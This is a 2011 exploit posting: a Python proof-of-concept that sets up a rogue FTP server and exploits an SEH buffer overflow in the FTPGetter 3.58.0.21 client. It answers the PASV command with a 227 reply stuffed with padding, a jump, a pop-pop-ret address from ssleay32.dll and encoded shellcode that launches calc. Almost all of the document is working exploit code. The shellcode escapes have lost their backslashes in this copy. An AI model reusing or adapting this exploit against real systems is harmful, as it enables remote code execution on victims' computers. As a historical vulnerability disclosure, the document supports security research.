FTPGetter 3.58.0.21 Buffer Overflow
Posted on 03 February 2011
#!/usr/bin/python # Exploit Title: FTPGetter v3.58.0.21 Buffer Overflow (PASV) Exploit # Date: 02/03/2011 # Author: modpr0be # Software Link: http://www.ftpgetter.com/ftpgetter_setup.exe # Vulnerable version: <= 3.58.0.21 # Tested on: Windows XP SP3 (VMware Player 3.1.3 build-324285) # CVE : N/A # ====================================================================== # ___ _ __ __ __ _ __ # ____/ (_)___ _(_) /_____ _/ / ___ _____/ /_ (_)___/ /___ ____ _ # / __ / / __ `/ / __/ __ `/ / / _ / ___/ __ / / __ / __ / __ `/ # / /_/ / / /_/ / / /_/ /_/ / / / __/ /__/ / / / / /_/ / / / / /_/ / # \__,_/_/\__, /_/\__/\__,_/_/ \___/\___/_/ /_/_/\__,_/_/ /_/\__,_/ # /____/ http://www.digital-echidna.org # ====================================================================== # # Greetz: # say hello to all digital-echidna org crew: # otoy, cipherstring, bean, s3o, d00m, n0rf0x, fm, gotechidna, manix # special thx: # otoy, cipherstring, cyb3r.anbu, oebaj. # help for documentation: # offsec, exploit-db, corelan-team, 5M7X, loneferret. # #### Software description: # Save time on FTP/SFTP updates! Plan your uploads and automate the workflow. # Schedule and automate file transfers with a centralized console. Let your # computer move or synchronize information securely between home and office # automatically according to the schedule! # #### Exploit information: # There was an error when sending a response to the PASV command. # Fortunately, these errors lead to buffer overflows. # This exploit is unstable. It should only be used as a POC. # I tried several times on various systems, # the buffer sometimes changed. # ### Some Conditions: # This POC is using "the most selling feature" Automated FTP Request. # So this POC, I use Auto Download with / as the Source Files. # Scheduler Settings also set to Repetitive. # Make sure to run the program first before this POC. # #### Other information: # It's a part of "Death of an FTP Client" :) # For more information, loot at here: # http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/ # ## from socket import * import struct import time total = 1000 junk1 = "x41" * 485 nseh = "xebx06x90x90" seh = struct.pack('<L', 0x1001A149) # ppr from ssleay32.dll nops = "x90" * 8 # msfpayload windows/exec CMD=calc R | msfencode -t c # [*] x86/shikata_ga_nai succeeded with size 223 (iteration=1) # BadChars x00xffx0dx5cx2fx0a shellcode = ( "xdbxd1xd9x74x24xf4x5ax31xc9xb1x32xb8xcaxeaxc0" "x1fx31x42x17x83xc2x04x03x88xf9x22xeaxf0x16x2b" "x15x08xe7x4cx9fxedxd6x5exfbx66x4ax6fx8fx2ax67" "x04xddxdexfcx68xcaxd1xb5xc7x2cxdcx46xe6xf0xb2" "x85x68x8dxc8xd9x4axacx03x2cx8axe9x79xdfxdexa2" "xf6x72xcfxc7x4ax4fxeex07xc1xefx88x22x15x9bx22" "x2cx45x34x38x66x7dx3ex66x57x7cx93x74xabx37x98" "x4fx5fxc6x48x9exa0xf9xb4x4dx9fx36x39x8fxe7xf0" "xa2xfax13x03x5exfdxe7x7ex84x88xf5xd8x4fx2axde" "xd9x9cxadx95xd5x69xb9xf2xf9x6cx6ex89x05xe4x91" "x5ex8cxbexb5x7axd5x65xd7xdbxb3xc8xe8x3cx1bxb4" "x4cx36x89xa1xf7x15xc7x34x75x20xaex37x85x2bx80" "x5fxb4xa0x4fx27x49x63x34xd7x03x2ex1cx70xcaxba" "x1dx1dxedx10x61x18x6ex91x19xdfx6exd0x1cx9bx28" "x08x6cxb4xdcx2exc3xb5xf4x4cx82x25x94x92") junk2 = "x90" * (total - len(junk1+nseh+seh+nops+shellcode)) payload = junk1+nseh+seh+nops+shellcode+junk2 host = "0.0.0.0" port = 21 s = socket(AF_INET, SOCK_STREAM) s.bind((host, port)) s.listen(1) print " [+] FTPGetter v3.58.0.21 Buffer Overflow POC" print "[+] by modpr0be[at]digital-echidna[dot]org." print "=============================================" print "[+] Evil FTP Server Started." print "[+] Listening on %d ..." % port cl, addr = s.accept() print "[+] Connection accepted from %s" % addr[0] print "[+] Whatever for username and password." def hajar(): welcome = "220 Welcome to EvilFTP Server " cl.send(welcome) cl.recv(1024) cl.send("331 User name okay, need password ") # received USER cl.recv(1024) cl.send("230-Password accepted ") # received PASS cl.send("230 User logged in. ") cl.recv(1024) cl.send("215 UNIX Type: L8 ") # received from SYST cl.recv(1024) cl.send("200 Type set to I ") # received from TYPE I cl.recv(1024) cl.send("200 OK ") # received from REST 0 cl.recv(1024) cl.send("200 Command not Understood ") # received from OPTS UTF8 OFF cl.recv(1024) cl.send("257 "/" is current directory ") # received from PWD cl.recv(1024) cl.send("250 CWD Command successful. ") cl.recv(1024) cl.send("257 "/" is current directory ") # received from PWD cl.recv(1024) cl.send("200 Type set to I ") # received from TYPE I cl.recv(1024) print "[+] Begin sending evil passive mode.." cl.send("227 Entering Passive Mode ("+payload+",1,1,1,1,1) ") # this is the junk from passive mode cl.recv(1024) cl.close() hajar() time.sleep(3) print "[+] Skadush! Calculator will pop out.. " s.close()
